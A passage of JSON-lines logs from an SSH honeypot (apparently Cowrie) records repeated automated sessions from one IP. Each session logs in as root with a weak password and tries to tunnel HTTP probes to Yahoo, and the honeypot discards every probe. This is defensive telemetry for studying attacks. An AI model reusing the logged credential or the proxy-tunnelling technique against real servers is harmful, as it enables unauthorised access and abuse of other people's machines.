,"arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.570871Z","src_ip":"213.209.150.239","session":"b4c3501fe289"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.805631Z","src_ip":"213.209.150.239","session":"b4c3501fe289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":11117,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:11117","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.854208Z","session":"b4c3501fe289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.901544Z","src_ip":"213.209.150.239","session":"b4c3501fe289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":308,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:308","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.037490Z","session":"b4c3501fe289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.084566Z","src_ip":"213.209.150.239","session":"b4c3501fe289"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.132581Z","src_ip":"213.209.150.239","session":"b4c3501fe289"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30402,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b9bb70bc0e5","protocol":"ssh","message":"New connection: 213.209.150.239:30402 (1.2.3.4:22) [session: 9b9bb70bc0e5]","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.188197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.188898Z","src_ip":"213.209.150.239","session":"9b9bb70bc0e5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.245745Z","src_ip":"213.209.150.239","session":"9b9bb70bc0e5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.527570Z","src_ip":"213.209.150.239","session":"9b9bb70bc0e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32488,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32488","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.585009Z","session":"9b9bb70bc0e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.641638Z","src_ip":"213.209.150.239","session":"9b9bb70bc0e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":13864,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13864","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.794893Z","session":"9b9bb70bc0e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.851423Z","src_ip":"213.209.150.239","session":"9b9bb70bc0e5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.908889Z","src_ip":"213.209.150.239","session":"9b9bb70bc0e5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30450,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebd2e6c6595f","protocol":"ssh","message":"New connection: 213.209.150.239:30450 (1.2.3.4:22) [session: ebd2e6c6595f]","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.964730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:14.965758Z","src_ip":"213.209.150.239","session":"ebd2e6c6595f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.022598Z","src_ip":"213.209.150.239","session":"ebd2e6c6595f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.305283Z","src_ip":"213.209.150.239","session":"ebd2e6c6595f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31547,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31547","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.362874Z","session":"ebd2e6c6595f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.419596Z","src_ip":"213.209.150.239","session":"ebd2e6c6595f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18432,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18432","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.575061Z","session":"ebd2e6c6595f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.631795Z","src_ip":"213.209.150.239","session":"ebd2e6c6595f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.689912Z","src_ip":"213.209.150.239","session":"ebd2e6c6595f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30502,"dst_ip":"1.2.3.4","dst_port":22,"session":"07e2fd3c63b4","protocol":"ssh","message":"New connection: 213.209.150.239:30502 (1.2.3.4:22) [session: 07e2fd3c63b4]","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.745128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.745790Z","src_ip":"213.209.150.239","session":"07e2fd3c63b4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:15.802322Z","src_ip":"213.209.150.239","session":"07e2fd3c63b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.084437Z","src_ip":"213.209.150.239","session":"07e2fd3c63b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":9016,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9016","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.141972Z","session":"07e2fd3c63b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.198583Z","src_ip":"213.209.150.239","session":"07e2fd3c63b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":5947,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5947","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.354772Z","session":"07e2fd3c63b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.411261Z","src_ip":"213.209.150.239","session":"07e2fd3c63b4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.468545Z","src_ip":"213.209.150.239","session":"07e2fd3c63b4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30556,"dst_ip":"1.2.3.4","dst_port":22,"session":"75b3489646e4","protocol":"ssh","message":"New connection: 213.209.150.239:30556 (1.2.3.4:22) [session: 75b3489646e4]","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.514601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.515409Z","src_ip":"213.209.150.239","session":"75b3489646e4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.562513Z","src_ip":"213.209.150.239","session":"75b3489646e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.796718Z","src_ip":"213.209.150.239","session":"75b3489646e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":23396,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:23396","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.845112Z","session":"75b3489646e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:16.892177Z","src_ip":"213.209.150.239","session":"75b3489646e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":11692,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11692","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.029418Z","session":"75b3489646e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.076492Z","src_ip":"213.209.150.239","session":"75b3489646e4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.124296Z","src_ip":"213.209.150.239","session":"75b3489646e4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30601,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7240b29b823","protocol":"ssh","message":"New connection: 213.209.150.239:30601 (1.2.3.4:22) [session: f7240b29b823]","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.179927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.180838Z","src_ip":"213.209.150.239","session":"f7240b29b823"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.237306Z","src_ip":"213.209.150.239","session":"f7240b29b823"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.519512Z","src_ip":"213.209.150.239","session":"f7240b29b823"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1614,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1614","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.577003Z","session":"f7240b29b823"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.633712Z","src_ip":"213.209.150.239","session":"f7240b29b823"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23920,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23920","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.787053Z","session":"f7240b29b823"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.843805Z","src_ip":"213.209.150.239","session":"f7240b29b823"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.901210Z","src_ip":"213.209.150.239","session":"f7240b29b823"}
